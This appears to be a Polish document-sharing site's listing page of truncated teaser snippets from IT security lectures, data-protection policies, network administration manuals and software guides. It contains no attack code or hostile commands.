Bezpieczeństwo danych i systemów informatycznych. Wykład 1 Bezpieczeństwo danych i systemów informatycznych Wykład 1 1. WPROWADZENIE 2 Bezpieczeństwo systemu komputerowego System komputerowy jest bezpieczny, jeśli jego użytkownik może na nim polegać, a zainstalowane

Bardziej szczegółowo

Audytowane obszary IT

Audytowane obszary IT Załącznik nr 1 do OPZ Zakres audytu wewnętrznego Audytowane obszary IT Audyt bezpieczeństwa wewnętrznego odbywać się będzie w 5 głównych obszarach 1) Audyt konfiguracji systemów operacyjnych na wybranych

Bardziej szczegółowo

Spis treści Wstęp 1. Wprowadzenie 2. Zarządzanie ryzykiem systemów informacyjnych

Spis treści Wstęp 1. Wprowadzenie 2. Zarządzanie ryzykiem systemów informacyjnych Wstęp... 13 1. Wprowadzenie... 15 1.1. Co to jest bezpieczeństwo informacji?... 17 1.2. Dlaczego zapewnianie bezpieczeństwa informacji jest potrzebne?... 18 1.3. Cele, strategie i polityki w zakresie bezpieczeństwa

Bardziej szczegółowo

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci WYMAGANIA EDUKACYJNE PRZEDMIOT: Administracja sieciowymi systemami operacyjnymi NUMER PROGRAMU NAUCZANIA (ZAKRES): 351203 1. Lp Dział programu Sieci komputerowe Poziomy wymagań Konieczny K Podstawowy-

Bardziej szczegółowo

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1 MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1 NetCrunch 7 monitoruje systemy MS Windows bez instalowania dodatkowych agentów. Jednakże, ze względu na zaostrzone zasady bezpieczeństwa, zdalne monitorowanie

Bardziej szczegółowo

Znak sprawy: KZp

Znak sprawy: KZp Załącznik nr 2 do SIWZ OPIS PRZEDMIOTU ZAMÓWIENIA Przedmiotem zamówienia jest przedłużenie aktualizacji i wsparcia technicznego dla systemu antywirusowego - 195 licencji. Lp. Parametr Nazwa 1 aktualizowanego

Bardziej szczegółowo

2.11. Monitorowanie i przegląd ryzyka 2.12. Kluczowe role w procesie zarządzania ryzykiem

2.11. Monitorowanie i przegląd ryzyka 2.12. Kluczowe role w procesie zarządzania ryzykiem Spis treści Wstęp 1. Wprowadzenie 1.1. Co to jest bezpieczeństwo informacji? 1.2. Dlaczego zapewnianie bezpieczeństwa informacji jest potrzebne? 1.3. Cele, strategie i polityki w zakresie bezpieczeństwa

Bardziej szczegółowo

Licencja SEE Electrical zabezpieczona kluczem lokalnym

Licencja SEE Electrical zabezpieczona kluczem lokalnym Licencja SEE Electrical zabezpieczona kluczem lokalnym V8R2 COPYRIGHT 1986-2018 IGE+XAO Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek

Bardziej szczegółowo

PROGRAM PRAKTYKI ZAWODOWEJ. Technikum Zawód: technik informatyk

PROGRAM PRAKTYKI ZAWODOWEJ. Technikum Zawód: technik informatyk PROGRAM PRAKTYKI ZAWODOWEJ Technikum Zawód: technik informatyk 351203 Lp. Temat 1 Zajęcia wprowadzające. Zapoznanie z zakładem, regulaminem pracy, przepisami BHP oraz instruktaż bhp. 2 Montaż i eksploatacja

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików

Bardziej szczegółowo

POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl

POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl SPIS TREŚCI I. POSTANOWIENIA OGÓLNE... 2 II. DEFINICJA BEZPIECZEŃSTWA INFORMACJI... 2 III. ZAKRES STOSOWANIA...

Bardziej szczegółowo

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami Windows Serwer 2008 R2 Moduł 5. Zarządzanie plikami Sprawdzamy konfigurację kart sieciowych 172.16.x.0 x nr w dzienniku Na serwerze musi działać Internet! Statyczny adres IP jest potrzebny komputerom,

Bardziej szczegółowo

POLITYKA E-BEZPIECZEŃSTWA

POLITYKA E-BEZPIECZEŃSTWA Definicja bezpieczeństwa. POLITYKA E-BEZPIECZEŃSTWA Przez bezpieczeństwo informacji w systemach IT rozumie się zapewnienie: Poufności informacji (uniemożliwienie dostępu do danych osobom trzecim). Integralności

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl

Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl Centrum Informatyki http://ci.ue.poznan.pl helpdesk@ue.poznan.pl al. Niepodległości 10, 61-875 Poznań tel. + 48 61 856 90 00 NIP: 777-00-05-497

Bardziej szczegółowo

Problemy techniczne SQL Server

Problemy techniczne SQL Server Problemy techniczne SQL Server Co zrobić, jeśli program Optivum nie łączy się poprzez sieć lokalną z serwerem SQL? Programy Optivum, które korzystają z bazy danych umieszczonej na serwerze SQL, mogą być

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego 2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5

Bardziej szczegółowo

Podstawy Informatyki. Wykład 4 Komendy UNIXa, cd

Podstawy Informatyki. Wykład 4 Komendy UNIXa, cd Podstawy Informatyki Wykład 4 Komendy UNIXa, cd Komendy UNIXa, cd: ls - listowanie zawartości katalogu (listing), 48%{sendzimir}/home/sysadm/wilk/dydaktyka/c>ls kar* karman* karman.cpp karman.out press.dat

Bardziej szczegółowo

Fiery Remote Scan. Uruchamianie programu Fiery Remote Scan. Skrzynki pocztowe

Fiery Remote Scan. Uruchamianie programu Fiery Remote Scan. Skrzynki pocztowe Fiery Remote Scan Program Fiery Remote Scan umożliwia zarządzanie skanowaniem na serwerze Fiery server i drukarce ze zdalnego komputera. Programu Fiery Remote Scan można użyć do wykonania następujących

Bardziej szczegółowo

Sprawozdanie. (notatki) Sieci komputerowe i bazy danych. Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików

Sprawozdanie. (notatki) Sieci komputerowe i bazy danych. Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików Sprawozdanie (notatki) Sieci komputerowe i bazy danych Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików Piotr Morawiec 22.03.2017 FTP (ang. File transfer Protocol) - protokół wymiany

Bardziej szczegółowo

Polityka bezpieczeństwa danych osobowych przetwarzanych w ramach Programu BIOsfera BIODERMA

Polityka bezpieczeństwa danych osobowych przetwarzanych w ramach Programu BIOsfera BIODERMA Polityka bezpieczeństwa danych osobowych przetwarzanych w ramach Programu BIOsfera BIODERMA 1 I. CZĘŚĆ OGÓLNA 1. Podstawa prawna: a) Ustawa z dnia 29 sierpnia 1997 r. o ochronie danych osobowych. (tekst

Bardziej szczegółowo

Instrukcja zarządzania systemem informatycznym STORK Szymon Małachowski

Instrukcja zarządzania systemem informatycznym  STORK Szymon Małachowski Instrukcja zarządzania systemem informatycznym służącym do przetwarzania danych osobowych w sklepie internetowym www.stork3d.pl prowadzonym przez firmę STORK Szymon Małachowski Właścicielem materialnych

Bardziej szczegółowo

Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania.

Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Q. Jak uruchomić instalator? A. Trzeba nadać instalatorowi atrybut 'wykonywalny'. Można to zrobić wydając polecenie `chmod

Bardziej szczegółowo

Samsung Universal Print Driver Podręcznik użytkownika

Samsung Universal Print Driver Podręcznik użytkownika Samsung Universal Print Driver Podręcznik użytkownika wyobraź sobie możliwości Copyright 2009 Samsung Electronics Co., Ltd. Wszelkie prawa zastrzeżone. Ten podręcznik administratora dostarczono tylko w

Bardziej szczegółowo

- dyrektor firmy wezwał serwis w celu zdiagnozowania i usunięcia usterek gdyż zauważono nieprawidłowości w działaniu systemu komputerowego,

- dyrektor firmy wezwał serwis w celu zdiagnozowania i usunięcia usterek gdyż zauważono nieprawidłowości w działaniu systemu komputerowego, 1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek.. 2. Założenia do

Bardziej szczegółowo

Laboratorium - Konfigurowanie zapory sieciowej systemu Windows 7

Laboratorium - Konfigurowanie zapory sieciowej systemu Windows 7 5.0 10.3.1.8 Laboratorium - Konfigurowanie zapory sieciowej systemu Windows 7 Wydrukuj i uzupełnij to laboratorium. W tym laboratorium zapoznasz się z zaporą systemu Windows 7 oraz będziesz konfigurował

Bardziej szczegółowo

Spis treści. Rozdział 3. Podstawowe operacje na plikach...49 System plików... 49 Konsola... 49 Zapisanie rezultatu do pliku... 50

Spis treści. Rozdział 3. Podstawowe operacje na plikach...49 System plików... 49 Konsola... 49 Zapisanie rezultatu do pliku... 50 Spis treści Rozdział 1. Instalacja systemu Aurox...5 Wymagania sprzętowe... 5 Rozpoczynamy instalację... 6 Wykrywanie i instalacja urządzeń... 7 Zarządzanie partycjami... 10 Konfiguracja sieci i boot loadera...

Bardziej szczegółowo

Procedura wdrożeniowa program MERKURY QUATTRO wer. 1.0

Procedura wdrożeniowa program MERKURY QUATTRO wer. 1.0 Syriusz sp. z o.o. Rzeszów, 2009 Procedura wdrożeniowa program MERKURY QUATTRO wer. 1.0 POSTANOWIENIA OGÓLNE Minimalna, sugerowana ilość godzin wdrożenia programu to: bez przenoszenia danych 8 godzin +

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Memeo Instant Backup Podręcznik Szybkiego Startu

Memeo Instant Backup Podręcznik Szybkiego Startu Wprowadzenie Memeo Instant Backup pozwala w łatwy sposób chronić dane przed zagrożeniami cyfrowego świata. Aplikacja regularnie i automatycznie tworzy kopie zapasowe ważnych plików znajdujących się na

Bardziej szczegółowo

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych Wykład 2: Budowanie sieci lokalnych 1 Budowanie sieci lokalnych Technologie istotne z punktu widzenia konfiguracji i testowania poprawnego działania sieci lokalnej: Protokół ICMP i narzędzia go wykorzystujące

Bardziej szczegółowo

INSTRUKCJA ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM W ADCONNECT SP. Z O.O. SP. K.

INSTRUKCJA ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM W ADCONNECT SP. Z O.O. SP. K. 1 INSTRUKCJA ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM W ADCONNECT SP. Z O.O. SP. K. SPIS TREŚCI I. Wprowadzenie II. Definicje III. Procedury nadawania uprawnień do Przetwarzania danych i rejestrowania tych

Bardziej szczegółowo

11. Autoryzacja użytkowników

11. Autoryzacja użytkowników 11. Autoryzacja użytkowników Rozwiązanie NETASQ UTM pozwala na wykorzystanie trzech typów baz użytkowników: Zewnętrzna baza zgodna z LDAP OpenLDAP, Novell edirectory; Microsoft Active Direcotry; Wewnętrzna

Bardziej szczegółowo

Win Admin Replikator Instrukcja Obsługi

Win Admin Replikator Instrukcja Obsługi Win Admin Replikator Instrukcja Obsługi Monitoring Kopie danych (backup) E-mail Harmonogram lokalne i zewnętrzne repozytorium Logi Pamięć Procesor HDD Administracja sprzętem i oprogramowaniem (automatyzacja

Bardziej szczegółowo

P O L I T Y K A P R Y W A T N O Ś C I. 1 Jak zbieramy dane?

P O L I T Y K A P R Y W A T N O Ś C I. 1 Jak zbieramy dane? P O L I T Y K A P R Y W A T N O Ś C I 1. Niniejsza Polityka Prywatności określa zasady gromadzenia, przetwarzania i wykorzystywania danych osobowych pozyskanych przez Sklep Internetowy www.yourboard.pl

Bardziej szczegółowo

Załącznik nr 2 Opis wdrożonych środków organizacyjnych i technicznych służących ochronie danych osobowych

Załącznik nr 2 Opis wdrożonych środków organizacyjnych i technicznych służących ochronie danych osobowych Załącznik nr 2 Opis wdrożonych środków organizacyjnych i technicznych służących ochronie danych osobowych Obszar System Zarządzania Bezpieczeństwem Informacji Polityki bezpieczeństwa. Opracowano ogólną

Bardziej szczegółowo

BEZPIECZEŃSTWO W SIECIACH

BEZPIECZEŃSTWO W SIECIACH PREZENTACJA NA SYSTEMY OPERACYJNE Katarzyna Macioszek styczeń 2007 DEFINICJA ROBAKA CO TO JEST ROBAK? PRZYKŁADY ROBAKÓW Robak - program komputerowy zdolny do samoreplikacji przez sieć bez interakcji użytkownika

Bardziej szczegółowo

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze?

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze? Poradnik zetula.pl Jak założyć konto na zetula.pl i zabezpieczyć dane na swoim komputerze? 1.Wejdź na stronę www.zetula.pl 2.Kliknij na odnośniku Utwórz nowe konto 3.Wypełnij formularz rejestracyjny. Pola

Bardziej szczegółowo

Sieci komputerowe. Wykład 5: Warstwa transportowa: TCP i UDP. Marcin Bieńkowski. Instytut Informatyki Uniwersytet Wrocławski

Sieci komputerowe. Wykład 5: Warstwa transportowa: TCP i UDP. Marcin Bieńkowski. Instytut Informatyki Uniwersytet Wrocławski Sieci komputerowe Wykład 5: Warstwa transportowa: TCP i UDP Marcin Bieńkowski Instytut Informatyki Uniwersytet Wrocławski Sieci komputerowe (II UWr) Wykład 5 1 / 22 Warstwa transportowa Cechy charakterystyczne:

Bardziej szczegółowo

oprogramowania F-Secure

oprogramowania F-Secure 1 Procedura wygenerowania paczki instalacyjnej oprogramowania F-Secure Wznowienie oprogramowania F-Secure zaczyna działać automatycznie. Firma F-Secure nie udostępnia paczki instalacyjnej EXE lub MSI do

Bardziej szczegółowo

Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania.

Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania. Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania. Założenia projektowe systemu NETDOC. część 1: założenia ogólne i funkcjonalność rdzenia systemu Założenia ogólne Celem projektu jest

Bardziej szczegółowo

Ochrona zasobów. Obejmuje ochronę: Systemów komputerowych, Ludzi, Oprogramowania, Informacji. Zagrożenia: Przypadkowe, Celowe.

Ochrona zasobów. Obejmuje ochronę: Systemów komputerowych, Ludzi, Oprogramowania, Informacji. Zagrożenia: Przypadkowe, Celowe. Ochrona zasobów Obejmuje ochronę: Systemów komputerowych, Ludzi, Oprogramowania, Informacji. Zagrożenia: Przypadkowe, Celowe. Zagrożenia celowe Pasywne: monitorowanie, podgląd, Aktywne: powielanie programów,

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Sieci komputerowe : zbuduj swoją własną sieć - to naprawdę proste! / Witold Wrotek. wyd. 2. Gliwice, cop Spis treści

Sieci komputerowe : zbuduj swoją własną sieć - to naprawdę proste! / Witold Wrotek. wyd. 2. Gliwice, cop Spis treści Sieci komputerowe : zbuduj swoją własną sieć - to naprawdę proste! / Witold Wrotek. wyd. 2. Gliwice, cop. 2016 Spis treści Wstęp 9 Dla kogo jest przeznaczona książka? 10 Komputer, smartfon, tablet 11 Jaką

Bardziej szczegółowo

Problemy techniczne. Jak udostępnić dane na potrzeby wykonania usługi serwisowej lub wdrożeniowej? Zabezpieczanie plików hasłem

Problemy techniczne. Jak udostępnić dane na potrzeby wykonania usługi serwisowej lub wdrożeniowej? Zabezpieczanie plików hasłem Problemy techniczne Jak udostępnić dane na potrzeby wykonania usługi serwisowej lub wdrożeniowej? Użytkownicy programów firmy VULCAN, korzystający z realizacji usług związanych z konfiguracją, parametryzacją

Bardziej szczegółowo

Temat: EasyAccess 2.0 Data: 10 Października 2014 Prowadzący: Maciej Sakowicz

Temat: EasyAccess 2.0 Data: 10 Października 2014 Prowadzący: Maciej Sakowicz Temat: EasyAccess 2.0 Data: 10 Października 2014 Prowadzący: Maciej Sakowicz Agenda Część 1: Studium przypadku i rozwiązanie Część 2: Czym jest EasyAccess 2.0? Część 3: Dlaczego warto użyć EasyAccess 2.0?

Bardziej szczegółowo

1 Jak zbieramy dane? 1/5

1 Jak zbieramy dane? 1/5 POLITYKA PRYWATNOŚCI 1. Niniejsza Polityka Prywatności określa zasady gromadzenia, przetwarzania i wykorzystywania danych osobowych pozyskanych przez serwis internetowy twojeankiety.pl (zwany dalej: Serwisem

Bardziej szczegółowo

Praca w sieci z serwerem

Praca w sieci z serwerem 11 Praca w sieci z serwerem Systemy Windows zostały zaprojektowane do pracy zarówno w sieci równoprawnej, jak i w sieci z serwerem. Sieć klient-serwer oznacza podłączenie pojedynczego użytkownika z pojedynczej

Bardziej szczegółowo

Podręcznik Google. Cloud Print. Informacje o usłudze Google Cloud Print. Drukowanie przy użyciu usługi Google. Cloud Print.

Podręcznik Google. Cloud Print. Informacje o usłudze Google Cloud Print. Drukowanie przy użyciu usługi Google. Cloud Print. Podręcznik Google Cloud Print Informacje o usłudze Google Cloud Print Drukowanie przy użyciu usługi Google Cloud Print Appendix Spis treści Jak korzystać z tego podręcznika... 2 Symbole użyte w tym podręczniku...

Bardziej szczegółowo

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI Asix Konfiguracja serwera MS SQL dla potrzeb systemu Asix Pomoc techniczna Dok. Nr PLP0024 Wersja:2015-03-04 ASKOM i Asix to zastrzeżony znak firmy ASKOM Sp.

Bardziej szczegółowo

Administratorzy kontrolują systemy IT, a kto kontroluje administratorów?

Administratorzy kontrolują systemy IT, a kto kontroluje administratorów? Administratorzy kontrolują systemy IT, a kto kontroluje administratorów? Bartosz Kryński bartosz.krynski@clico.pl O czym w trakcie tej sesji Strefa DMZ LAN Bazy danych Czy: 1. naprawdę wiesz gdzie są istotne

Bardziej szczegółowo

Podstawy zabezpieczania serwera. Marcin Bieńkowski

Podstawy zabezpieczania serwera. Marcin Bieńkowski komputerowa Podstawy zabezpieczania serwera Marcin Bieńkowski Instytut Informatyki Uniwersytet Wrocławski komputerowa () Podstawy zabezpieczania serwera 1 / 17 Z oczywistych przyczyn... Pojawia się tu

Bardziej szczegółowo

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa Metody włamań do systemów komputerowych SQL injection Bogusław Kluge, Karina Łuksza, Ewa Makosa b.kluge@zodiac.mimuw.edu.pl, k.luksza@zodiac.mimuw.edu.pl, e.makosa@zodiac.mimuw.edu.pl Metody włamań do

Bardziej szczegółowo

Fiery Remote Scan. Łączenie z serwerami Fiery servers. Łączenie z serwerem Fiery server przy pierwszym użyciu

Fiery Remote Scan. Łączenie z serwerami Fiery servers. Łączenie z serwerem Fiery server przy pierwszym użyciu Fiery Remote Scan Program Fiery Remote Scan umożliwia zarządzanie skanowaniem na serwerze Fiery server i drukarce ze zdalnego komputera. Programu Fiery Remote Scan można użyć do wykonania następujących

Bardziej szczegółowo

Szczegółowy opis przedmiotu zamówienia:

Szczegółowy opis przedmiotu zamówienia: Załącznik nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia: I. Opracowanie polityki i procedur bezpieczeństwa danych medycznych. Zamawiający oczekuje opracowania Systemu zarządzania bezpieczeństwem

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część II. Polityka bezpieczeństwa systemu ActivPack CLICO Centrum Oprogramowania Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków; Tel: 12

Bardziej szczegółowo

Ustalanie dostępu do plików - Windows XP Home/Professional

Ustalanie dostępu do plików - Windows XP Home/Professional Ustalanie dostępu do plików - Windows XP Home/Professional Aby edytować atrybuty dostępu do plikow/ katalogow w systemie plików NTFS wpierw sprawdź czy jest Wyłączone proste udostępnianie czyli przejdź

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Pracownia internetowa w każdej szkole (edycja jesień 2005) Instrukcja numer SPD1/04_03/Z2 Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 1 (PD1) Przygotowanie własnego obrazu systemu operacyjnego dla stacji roboczych

Bardziej szczegółowo

MBUM #2 MikroTik Beer User Meeting

MBUM #2 MikroTik Beer User Meeting MikroTik Beer User Meeting Zabezpieczenie routerów MikroTik. Omówienie ostatnio ujawnionych luk. Michał Filipek Michał Filipek Ukończył Politechnikę Warszawską na kierunku Informatyka. Na przestrzeni ostatnich

Bardziej szczegółowo

Polityka bezpieczeństwa danych osobowych przetwarzanych w ramach Programu BIOsfera BIODERMA

Polityka bezpieczeństwa danych osobowych przetwarzanych w ramach Programu BIOsfera BIODERMA Polityka bezpieczeństwa danych osobowych przetwarzanych w ramach Programu BIOsfera BIODERMA I. CZĘŚĆ OGÓLNA 1 1. Podstawa prawna: a) Ustawa z dnia 29 sierpnia 1997 r. o ochronie danych osobowych. (tekst

Bardziej szczegółowo

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl Niniejsze zasady dotyczą wszystkich Użytkowników strony internetowej funkcjonującej w domenie http://www.pawlowskisport.pl,

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

Instrukcje ustawień funkcji zwalniania wydruku

Instrukcje ustawień funkcji zwalniania wydruku Instrukcje ustawień funkcji zwalniania wydruku SPIS TREŚCI O INSTRUKCJI........................................................................................ 2 FUNKCJA ZWALNIANIA WYDRUKU......................................................................

Bardziej szczegółowo

System kontroli dostępu ACCO NET Instrukcja instalacji

System kontroli dostępu ACCO NET Instrukcja instalacji System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166

Bardziej szczegółowo

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Status: Tajemnica handlowa Wersja z dnia: 23 października 2013 Strona: 1 z 8 SPIS TREŚCI 1. Wymagania dla serwera

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

Pracownia internetowa w każdej szkole (edycja Jesień 2007) Instrukcja numer D1/05_03/Z Pracownia internetowa w każdej szkole (edycja Jesień 2007) Opiekun pracowni internetowej cz. 1 Ręczne zakładanie kont użytkowników (D1) Jak ręcznie założyć konto w systemie

Bardziej szczegółowo

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7 I Wprowadzenie (wersja 0906) Kurs OPC S7 Spis treści Dzień 1 I-3 O czym będziemy mówić? I-4 Typowe sytuacje I-5 Klasyczne podejście do komunikacji z urządzeniami automatyki I-6 Cechy podejścia dedykowanego

Bardziej szczegółowo

Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX

Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX Wprowadzenie 17 Rozdział 1. Bezpieczeństwo sieci 27 Słabe punkty 27 Typy ataków 28 Ataki rozpoznawcze 29 Ataki dostępu 29 Ataki

Bardziej szczegółowo

ŚRODOWISKO KOMPUTEROWYCH SYSTEMÓW INFORMATYCZNYCH TEST PEŁNY Status obszaru: Jeszcze nie edytowany (otwarty) Opracowano 0 z 55

ŚRODOWISKO KOMPUTEROWYCH SYSTEMÓW INFORMATYCZNYCH TEST PEŁNY Status obszaru: Jeszcze nie edytowany (otwarty) Opracowano 0 z 55 Aby uzyskać szczegółowe instrukcje do opracowania dokumentu należy otworzyć poniższe hiperłącze: 400 - B.V Środowisko komputerowych systemów informatycznych.pdf 1. Czy chcesz przeprowadzić pełny czy skrócony

Bardziej szczegółowo

Tomasz Greszata - Koszalin

Tomasz Greszata - Koszalin T: Usługi serwerowe w systemie Windows - telnet. Zadanie1: Sprawdź informacje w serwisie Wikipedii na temat usługi telnet. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do

Bardziej szczegółowo

Wykład Nr 4. 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia

Wykład Nr 4. 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia Sieci komputerowe Wykład Nr 4 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia Sieci bezprzewodowe Sieci z bezprzewodowymi punktami dostępu bazują na falach radiowych. Punkt dostępu musi mieć

Bardziej szczegółowo

Bezpieczeństwo danych w sieciach elektroenergetycznych

Bezpieczeństwo danych w sieciach elektroenergetycznych Bezpieczeństwo danych w sieciach elektroenergetycznych monitorowanie bezpieczeństwa Janusz Żmudziński Polskie Towarzystwo Informatyczne Nadużycia związane z bezpieczeństwem systemów teleinformatycznych

Bardziej szczegółowo

BlackHole. Bezpieczne Repozytorium Ważnych Zasobów.

BlackHole. Bezpieczne Repozytorium Ważnych Zasobów. BlackHole. Bezpieczne Repozytorium Ważnych Zasobów. OPIS OGÓLNY Rozwiązanie jest odpowiedzią na rosnące zagrożenie ze strony wyrafinowanych wirusów, które wykorzystując sieć komputerową szyfrują dostępne

Bardziej szczegółowo

Instalacja systemów operacyjnych i tworzenie domeny

Instalacja systemów operacyjnych i tworzenie domeny Przygotowanie VMWARE SERVER do pracy Zainstaluj VMWARE SERVER Zainstaluj VMWARE TOOLS (potrzebne połączenie z Internetem) Instalacja systemów operacyjnych i tworzenie domeny Zainstaluj Microsoft Windows

Bardziej szczegółowo

Test. Administrowanie sieciowymi systemami operacyjnymi

Test. Administrowanie sieciowymi systemami operacyjnymi Test Administrowanie sieciowymi systemami operacyjnymi 1) Która warstwa modelu ISO/OSI jest związana z protokołem IP? A. Sieciowa. B. Fizyczna. C. Transportowa. D. Łącza danych. 2) W sieciach lokalnych,

Bardziej szczegółowo

Win Admin Replikator Instrukcja Obsługi

